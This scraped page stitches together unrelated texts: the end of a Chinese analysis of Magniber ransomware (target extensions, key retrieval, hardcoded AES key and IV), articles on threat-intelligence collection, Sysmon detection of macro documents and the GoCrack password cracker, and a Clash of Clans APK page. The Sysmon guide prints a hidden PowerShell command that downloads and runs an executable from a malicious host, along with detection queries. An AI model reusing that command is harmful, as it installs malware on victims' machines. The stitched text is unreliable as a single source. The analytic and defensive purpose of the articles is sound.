fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg
 gem glox hpg hpg hp idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx 
mmat mat ovp ovr pcs pfv plt vrm pobj psid rd scv sk1 sk2 ssk stn svf svgz 
tlc tne ufr vbr vec vm vsdm vstm stm vstx wpg vsm xar ya orf ota oti ozb 
ozj ozt pa pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 
pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg 
ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli
 rpf rri rs rsb rsr rw2 rw s2mv sci sep sfc sfw skm sld sob spa spe sph spj 
spp sr2 srw wallet jpeg jpg vmdk arc paq bz2 tbk bak tar tgz gz 7z rar zip 
backup iso vcd bmp png gif tif tiff m4u m3u mid wma flv 3g2 mkv 3gp mp4 mov
avi asf mpeg vob mpg wmv fla swf wav mp3 

该列表在文件加密功能启动前就加载完成了:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

当然,还是会有一些被排除在外的目录:

:/documents and settings/all users/ 
:/documents and settings/default user/ 
:/documents and settings/localservice/ 
:/documents and settings/networkservice/ 
/appdata/local/ 
/appdata/locallow/ 
/appdata/roaming/ 
/local settings/ 
/public/music/sample music/ 
/public/pictures/sample pictures/ 
/public/videos/sample videos/ 
/tor browser/ 
/$recycle.bin 
/$windows.~bt 
/$windows.~ws 
/boot 
/intel 
/msocache 
/perflogs 
/program files (x86) 
/program files 
/programdata 
/recovery 
/recycled 
/recycler 
/system volume information 
/windows.old 
/windows10upgrade 
/windows 
/winnt

Magniber如何实现文件加密?

Magniber利用CBC模式下的AES 128位进行文件加密,需借助Windows Crypto API的帮助。

DGA与受害者ID

通常情况下,恶意软件会尝试通过查询伪随机子域从CnC中检索AES密钥:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

伪随机部分只用于识别受害者,由以下简单算法生成:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

每个字符都按照Tick Count计数,被转换为给定的字符集:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

数字0或1是否添加到URL中取决于样本是否在调试器下运行(根据时间检测)。

下面对四个域进行了密钥查询:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

如果其中任何一个域给出长16个字节的响应内容,那么就表明有效的密钥被复制到缓冲区并进一步使用。否则,它将返回至硬编码密钥。

默认的AES密钥和IV

有意思的是每个样本都带有硬编码的AES密钥。但是这个只作备份用,例如,如果由于某些原因突然无法从CnC下载密钥(如果公共IP不来自韩国也会发生这样的情况)。每个样本密钥都是唯一的。当前分析样本的密钥是:S25943n9Gt099y4K:

如果其中任何一个域给出长16个字节的响应内容,那么就表明有效的密钥被复制到缓冲区并进一步使用。否则,它将返回至硬编码密钥。

Magniber剖析:一款只以韩国为攻击目标的勒索软件

类似地,初始化向量(IV)在样本中始终为硬编码(但未下载)。文件开头也保存了同样16个字符的长字符串。在当前分析的样本中是EP866p5M93wDS513:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

算法

首先,密码初始化。恶意软件利用函数CryptImportKey和CryptSetKeyParam导入密钥和初始化向量:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

文件加密:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

第一个写入完成文件开头16字节长字符串的存储。然后,按区块读取文件,并使用Windows Crypto API完成加密。

总结

Magniber正在取代Cerber,通过同一个工具包发布,具有相同的攻击对象。但从内部机制来看又与Cerber相去甚远,更为简化。它最大的特点就是对攻击对象的挑剔程度,不是韩文系统不攻击。这也算勒索软件历史上的一个奇葩了。

从这个事件也能看出,勒索软件开发者并没有停下脚步,还是在勤勤恳恳地开发着这些邪恶的东西。Freebuf也会持续关注,及时报道。

*参考来源:malwarebytes,FB小编Carrie编译,转载请注明来自FreeBuf.COM

企业如何有效收集公开来源的威胁情报

*本文原创作者:scu-igroup,本文属FreeBuf原创奖励计划,未经许可禁止转载

1.前言

威胁情报作为信息安全领域一个正在茁壮成长的分支,在当下依旧处于混浊状态。即网络中存在着大量的所谓“情报”,它们的结构不同、关注方向不同、可信度不同、情报内容不同、情报的来源也是千奇百怪。这使得威胁情报在实际的运用中面临许多问题,而这其中的关键问题在于,在现阶段无法统一有效的提取出威胁情报中能够应用的关键信息。

为了在一定程度上解决这一问题,我们做了一点微小的工作,通过爬取网上已经公开的威胁情报内容,提取其中的域名、URL、IP等数据,作为威胁情报库的基础数据。由此可以看出,威胁情报库的丰富,在于情报来源的丰富,也在于对威胁情报内容的有效提取。

2.来源

我们关注的是威胁情报中的域名、URL、IP等数据,这些数据的来源主要有两类。

一、开源的黑名单,在网上有大量的开源黑名单FireHOLsans.edu等。这些黑名单更新迅速、可信度高,是我们所关注的信息的一个很好的来源。且十分容易处理。

二、安全咨询类网站上的文章,在这些文章中往往包含了很多的特定主题下的IoC信息,这些信息具有针对性强的特点,即一个IP或域名可以对应到某一具体的事件。这也是威胁情报收集中非常重要的一类来源,但其最大的问题是这些信息一般都在文章中出现,其间夹杂了大量的冗余信息,使得提取这些数据具有一定的困难。

关于来源,我们正努力搜集其他的威胁情报来源。因为收集的情报越全面,越能发挥威胁情报的作用。目前在这一领域的先驱者国内有360威胁情报中心和微步在线。

3.开源黑名单获取脚本

现有的来源主要是一些网站,针对这些来源,想要自动化的提取信息最有效的办法是爬虫。下面介绍我们编写的其中的一个主要爬虫脚本,该脚本主要爬取FireHOL网站上的IP黑名单。

企业如何有效收集公开来源的威胁情报

其使用到的python库如上图所示。该爬虫主要分为三个步骤。第一步获取基础页面中的文件链接,这一步中主要的难点在于解析下载到的HTML文件,在本例中,使用urllib2包拿到的HTML文件中并不包含所需信息,通过抓包发现在一个请求的JSON文件中。因此只要直接获取该JSON文件就可以得到想要的文件的下载链接。其代码如下。

企业如何有效收集公开来源的威胁情报

其得到的文件如下图所示。将该json文件解析后就能得到想要的文件链接。

企业如何有效收集公开来源的威胁情报

在获取到了具体文件的下载链接后,就可以通过如下代码进行第二步,使用多线程的方式迅速的将存有IP、域名的文件取回。所以在爬虫运行时会生成大量的html文件。

第三步,依据文件中的数据类别,分别将这些文件中的内容存入到数据库中。按照数据种类的不同,存储在3张表中,分别是URL、IP、域名的表,给不同的来源建立一个索引,高效的存储在数据库中。其中有URL24601条、IP1163481条、域名54265条。并且随着我们工作的开展,这个数据库中的内容会越来越多。

企业如何有效收集公开来源的威胁情报

企业如何有效收集公开来源的威胁情报

除了以上提到的这个网站外,我们还收集了其余的20多个网站,并在不断地添加过程中,详情请访问我们的Github,来源和相关代码都已上传。

4.从文章中提取IoC信息

从文章中提取IoC信息是我们关注的数据(恶意IP、恶意URL、恶意域名)的另一个来源。从文章中提取的IoC信息比起开源黑名单中的数据来说有一大优势,就是每一个IoC信息都可以对应到具体的事件,而这些事件往往都是通过安全人员分析的具有高可信度的一类信息。所以这类信息比起开源黑名单中的数据来说具有更高的价值。

另外,这些网站的文章中往往还有别的类似网站的链接,还可以通过这些链接中寻找新的来源。

在这里展示其中一个例子,badcyber.com是国外一个信息安全类咨询网站,会每周定期地发布一些有关信息安全的文章。通过筛选这些文章,可以发现威胁情报类的事件咨询,并提取出用的IoC信息和新的IoC来源。如下图所示即是爬取的badcyber中发布的信息安全咨询类文章的题目和链接。

企业如何有效收集公开来源的威胁情报

从这些咨询类文章中筛选出威胁情报类文章,一个篇是否是我们需要的威胁情报类文章,主要看该文章中是否有IoC信息,有则提取出来放到数据库中。

下图展示的是从这些文章中提取的IoC信息。包括,文章链接、文章中出现的IoC信息、时间。

企业如何有效收集公开来源的威胁情报

5.一个小例子

在获取了这么多的数据之后,这里给出一个使用这些数据的小例子。在Windows和Linux中分别使用winpcap库和libpcap库用C语言编写一个捕获DNS包的小程序DNS_Sniffer,该程序可以抓取电脑中发起的域名请求,并将这些请求存到文件中,并通过程序自动比对这些域名请求是否在威胁情报库中。

其大致流程如下图所示。

企业如何有效收集公开来源的威胁情报

把捕获到的数据存储在一个如下图所示的文件中。

企业如何有效收集公开来源的威胁情报

然后利用python脚本request.py查询这些域名,判断其中是否有恶意行为。如果发现有恶意行为结果如下图所示。

企业如何有效收集公开来源的威胁情报

6.结语

威胁情报的收集是一项非常复杂且庞大的工程,特别是威胁情报来源丰富,内容结构不一致,给收集工作带来不小的挑战。但这也是非常值得研究的问题,不少企业已在威胁情报的自动采集、提取和威胁情报信息的标准化上做了不少的工作,我们也将朝这个方向继续努力。在此,希望通过我们所做的一点微小的工作抛砖引玉, 欢迎大家一起讨论。

详情见:https://github.com/scu-igroup/Ti_Collector

*本文原创作者:scu-igroup,本文属FreeBuf原创奖励计划,未经许可禁止转载

如何使用Sysmon监视工具来寻找含有宏的恶意文档

之前的文章,我已经多次介绍过关于sysmon,简单来说Sysmon是一个能监视你系统的轻量级工具。

sysmon介绍

sysmon是由Windows Sysinternals出品的一款Sysinternals系列中的工具。它以系统服务和设备驱动程序的方法安装在系统上,并保持常驻性。sysmon用来监视和记录系统活动,并记录到windows事件日志,可以提供有关进程创建,网络链接和文件创建时间更改的详细信息。

通过收集使用Windows事件集合或SIEM代理生成的事件,然后分析它们,你可以识别恶意或异常活动,并了解入侵者和恶意软件在你的网络上如何操作。

所以,本文我会介绍一下如何使用Sysmon寻找带宏的Word恶意文档。

使用场景

目前钓鱼攻击肆虐,稍微一不小心就可能被攻击。最常见的钓鱼手段就是攻击者会发送一些带有链接或Word文档附件的诱骗电子邮件,当用户打开时,恶意行为就会开启。所以如果能在带宏的Word恶意文档打开之时,用Sysmon进行提前检测,那被攻击的概率就会下降很多。

电子邮件

以下是用户收到的一些电子邮件的形式,有的带有链接有的是带有附近。

如何使用Sysmon监视工具来寻找含有宏的恶意文档

当用户采取以下操作时,就将看到使用sysmon记录的操作。我还将包括字段名,以防你有ELK设置,以便于在你的环境中轻松搜索这些命令或进程。

你将看到以下这3个捕获的Sysmon事件ID:

事件ID 1:进程创建,进程创建事件提供了有关新创建的进程的扩展信息。比如,完整的命令行提供了进程执行的上下文,ProcessGUID字段是跨域标识某个进程的唯一字符,以便更加方便地处理相关事件,另外,所用的哈希算法都用的是HashType字段且为完整的哈希字段。

事件ID 11:FileCreate,创建或覆盖文件时,这些创建操作会被记录下来。此事件对于监控自动启动位置,如启动文件夹目录、临时目录、下载目录非常有用,而这些目录正是初始感染阶段恶意运行要用到的目录。

事件ID 15:FileCreateStreamHash,当创建命名文件流时就会生成该事件,事件日志中会记录下文件流所对应的文件内容的哈希值以及命名文件流的内容。有一些恶意软件可以通过浏览器下载来删除它们的可执行文件或配置设置,而这个事件的目的是基于MOTW(mark of the web)区域,以捕获这个区域的文件流。MOTW 是一个注释作为标签添加到网页中的,当用户打开存储在本地的网页文档时,浏览器通过读这个注释判断是否在安全区域。

寻找带宏的Word恶意文档

点击钓鱼链接

如何使用Sysmon监视工具来寻找含有宏的恶意文档

捕捉到的事件代码段如下:

EventID: 1
event_data.ParentCommandLine: “C:/Program Files (x86)/Microsoft Office/Office14/OUTLOOK.EXE”
event_data.Image: C:/Program Files/Internet Explorer/iexplore.exe
event_data.CommandLine: “C:/Program Files/Internet Explorer/iexplore.exe” https://Dcompany.life_qliwiwkwstxrkgbbz_bdfnccd&d=DwMF-Q&c=LQ_lgKiodJdZA
event_data.User: PhishedUser

让我给你解读一下该代码段:PhishedUser点击了Outlook中的一个链接,启动了IE浏览器,并打开了一个叫https://company.life_q…..com的网站。

Word恶意文档的下载

如何使用Sysmon监视工具来寻找含有宏的恶意文档

捕捉到的事件代码段如下:

EventID: 11
event_data.Image: C:/Program Files (x86)/Internet Explorer/IEXPLORE.EXE
event_data.TargetFilename: C:/Users/PhisedUser/AppData/Local/Microsoft/Windows/Temporary Internet Files/Content.IE5/POHSQH12/6E713D2A.doc

让我给你解读一下该代码段:IE浏览器下载了一个名为6E713D2A.doc的文件。请注意:日志有时可能会显示为.tmp文件,这是因为有些事件在日志记录时,还未下载未完成。

Word恶意文档的打开

如何使用Sysmon监视工具来寻找含有宏的恶意文档

捕捉到的事件代码段如下:

EventID: 1
event_data.Image: C:/Program Files (x86)/Microsoft Office/Office14/WINWORD.EXE
event_data.TargetFilename: C:/Users/PhisedUser/AppData/Local/Microsoft/Windows/Temporary Internet Files/Content.IE5/POHSQH12/6E713D2A.doc

让我给你解读一下该代码段:用户打开了6E713D2A.doc文件。

启用宏的Word文档

如何使用Sysmon监视工具来寻找含有宏的恶意文档

捕捉到的事件代码段如下:

EventID: 1
event_data.ParentImage: C:/Program Files (x86)/Microsoft Office/Office14/WINWORD.EXE
event_data.ParentCommandLine: “C:/Program Files (x86)/Microsoft Office/Office14/WINWORD.EXE” -Embedding
event_data.Image: C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe
event_data.CommandLine: powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;$myurls = ‘http://Malicioussite.su/z3FRJz’.Split(‘,’);$path = $env:temp + ‘65536.exe’;foreach($myurl in $myurls){try{$webclient.DownloadFile($myurl.ToString(), $path);Start-Process $path;break;}catch{}}
event_data.User: PhisedUser

让我给你解读一下该代码段:带有宏的Word恶意文档被启动,并运行了一个powershell命令,该命令正在尝试从http://Malicioussite.su/z3FRJz下载一个名为65536.exe的可执行文件。

通过Powershell下载的有效载荷

如何使用Sysmon监视工具来寻找含有宏的恶意文档

捕捉到的事件代码段如下:

event_id: 11
event_data.Image: C:/Windows/SysWOW64/Windows/PowerShell/v1.0/powershell.exe
event_data.TargetFilename: C:/Users/PhisedUser/AppData/Local/Temp/65536.exe

让我给你解读一下该代码段:Powershell将65536.exe下载到C:/Users/PhisedUser/AppData/Local/Temp

在该恶意软件启动之后,就可以执行各种恶意攻击了,例如加密用户的文件,或者建立某种持久性攻击。不过如果你感兴趣,那你可以了解Sysmon记录的其它恶意操作,以确切地知道进行了哪些更改,比如,未经授权的软件出站连接

现在我们就完全了解了这些事件的记录过程,可以对其操作进行进一步简化。

检测相关操作

如果你有良好的日志管理方式,如ELK,Splunk等,那你应该有一些预定义的保存的搜索,这将允许你在你的环境中寻找恶意目标。你可以通过以下的查询语句,来查找通过Word或其他微软产品启动的某些进程,如cscript.exe,cmd.exe,powershell.exe,wscript.exe。

event_data.ParentImage: office AND (event_data.Image: (wscript.exe OR cscript.exe OR cmd.exe or powershell.exe))

查询结果如下。

如何使用Sysmon监视工具来寻找含有宏的恶意文档

另外,微软产品,如Word,Excel,PowerPoint等可能会调用其他可执行文件,比如,在rundll.32.exe文件中 ,通常你会捕捉到事件ID 1,它与outlook中的打印文档(File > Print)或文件索引(“C:WindowsSystem32rundll32.exe” shell32.dll,Control_RunDLL “srchadmin.dll”)有关。除此之外,在conhost.exe,regsvr32.exe,Explorer.exe中都能捕获类似事件。

此外,还有一些查询语句非常有用,可以查找在outlook中的“.doc”文档。

比如,可以用以下语句查询事件ID 1

event_data.ParentImage: outlook.exe AND event_data.CommandLine: “.doc”

可以用以下语句查询事件ID 15

event_data.Image: outlook.exe AND event_data.TargetFilename: “.doc”

请注意:只有确保你检查了运行环境中的所有内容,才能识别出正常运和非正常的运行行为、查询语句,并最终确保你做出提前预防。

防止代宏的恶意文档

下面我给出5种方法,来让你免受此类威胁:

1.点开任何链接或附件时一定要仔细看清楚,并进行安全检测。

2.通过GPO阻止Office 2016的宏运行。对于Office 2013,你可以通过设置Office选项,禁用所有具有通知或不通知的宏。

3.阻止有效载荷下载,通过应用层防火墙,你可以只让白名单的信任站点下载.exe文件。

4.监控所有端点日志。

5.主动了解任何与安全有关的资讯。

*本文作者:liulang,转载请注明来自 FreeBuf.COM

快讯 | FireEye在GitHub上开源密码破解工具GoCrack

近日,FireEye 开源了一款密码破解工具 GoCrack,可在多机器上部署破解任务。

GoCrack 是由 FireEye’s Innovation and Custom Engineering (ICE) 团队开发的密码破解工具,它便于使用,基于网页进行后台管理,可实时呈现数据结果。

FireEye高级漏洞工程师表示

你只需在一台机器上(支持GPU / CPU)部署 GoCrack 服务器, GoCrack 会自动在 GPU / CPU 机器上分配任务。

GoCrack 源码现已开源在 GitHub 上。

用户可以直接通过源码安装,或者使用 docker 容器安装必要组件

我们也使用了 Dockerfile 来帮助用户使用 GoCrack ,装有 Docker 的 Linux 服务器也可以安装相应组件。使用 NVIDIA GPU 的用户可以使用 NVIDIA Docker 在容器中完全访问 GPU。

使用 GoCrack

用户只需要一个简单的网页交互界面就可以创建,浏览,管理破解任务。

快讯 | FireEye在GitHub上开源密码破解工具GoCrack

仪表盘

考虑到密码的敏感性,GoCrack 使用了授权系统,可防止用户(除了创建者或已经得到授权的用户)访问任务数据,而一些敏感操作,如修改任务,查看破解密码,下载任务文件等都可以被记录下来,并供管理员审核。

引擎文件(破解引擎使用的文件),如 Dictionaries,Mangling Rules等,这些都可以以共享的形式上传,其他用户可以在任务中使用它们,但不能下载或编辑,这也保证了敏感数据不会被查看。

在所有的引擎文件上传完之前,GoCrack 任务无法运行。

GoCrack 支持 hashcat v3.6+ ,不需要额外的数据库服务器(纯文件即可)并且支持 LDAP 和基于数据库授权。

GoCrack 计划增加对 MySQL 和PostgreSQL 数据库支持,这样可以实现更大的部署规模,方便在 UI 中管理和编辑文件,任务到期后自动结束和对 hashcat 引擎更高级的配置。

快讯 | FireEye在GitHub上开源密码破解工具GoCrack

任务列表

快讯 | FireEye在GitHub上开源密码破解工具GoCrack

任务状态

快讯 | FireEye在GitHub上开源密码破解工具GoCrack

“破解的密码”选项卡

GoCrack 对测试密码健壮性十分重要

这个工具对于安全测试人员来说很有帮助,他们可以更好地测试密码健壮性,优化密码存储方案,审计当前密码需求,破解 exfil 档案中的密码等。

GoCrack 会记录下任何可疑行为,并且会对未授权的用户隐藏数据内容。

研究人员表示,GoCrack 很可能会成为一些不法分子的专属工具。

*参考来源:helpnetsecuritysecurityaffairs,FB小编 Liki 编译,转载请注明来自FreeBuf.COM

Clash of Clans


Home »
Games »
Strategy »
Clash of Clans



Clash of Clans

Clash of Clans


(4.7/5 average rating by 15 users)

Clash of Clans APK file information

Package name: com.supercell.clashofclans

Version:
9.256.18 (920)

File size:
88.9 MB

Updated:
October 24, 2017

Minimum Android version:
Android 4.0.3 (Ice Cream Sandwich, API 15)

MD5: ff19823ec1ebdd6ada5e6d10b3e5f8d8

SHA1: 4b90ec7d3136a215e6b306471557727d7a4dd634

Advertisement:

More about Clash of Clans

Download Clash of Clans Latest APK v9.256.18 for Android. This is October 2017 clash of clans update! Clash of Clans is a strategical and managerial game in a virtual world, where you have to build your own village where your powerful clans will live and battle with millions of other players online. You are required to build a powerful clan with other clans so that you beat enemy clans when a war happens.

This game is free to play, but comes with in-app purchases. There are many units available which will be improved as you gain experience.

There are two absolutely different stages.
1. You have to build different building units and hire residents (need to be paid). Also build your defense structure, which is significant to block the enemy attack that will be coming soon or late.
2. After building a powerful clan, fight your enemies and defeat them with you skills. You strategy will be tested in this fight.

Clash of Clans is an addictive mixture of strategic planning and competitive fast-paced combat. Raise an army of Barbarians, Wizards, Dragons and other mighty fighters. Join a Clan of players and rise through the ranks, or create your own Clan to contest ownership of the Realm. Driving back the goblins is just the first step – your quest isn’t over until your clan reigns supreme over all others!

FEATURES:
– FREE TO PLAY.
– Build your village into a unbeatable fortress. Thats Fun!
– Battle with players worldwide and take their Trophies.
– Join together with other players to form the ultimate Clan, You may request others to join your clan or join other’s.
– Fight against rival Clans in the epic Clan Wars.
– Discover your favorite attacking army from countless combinations of troops, spells, Heroes and Clan reinforcements.
– Defend your village with Cannons, Towers, Mortars, Bombs, Traps and Walls.
– Fight against the Goblin King in an epic campaign through the realm.

Note: Clash of Clans is an online game and requires a network connection to play .

Visit Supercell website for more information.

Category: Strategy
Operating System: Android
Price: Free


Screenshots:

×
Clash of Clans
Clash of Clans
Clash of Clans
Clash of Clans
Clash of Clans
Clash of Clans
Clash of Clans

Older Versions of Clash of Clans:

Advertisement

What’s new in this version of Clash of Clans?
It’s time for Clash’s frightful night!
• Special obstacles are spawning.
• 1-Gem Spell brewing boost.
• Celebrate Halloween Clash-style with the Pumpkin Barbarian and Giant Skeleton.

Apps Similar to Clash of Clans

More Apps by Developer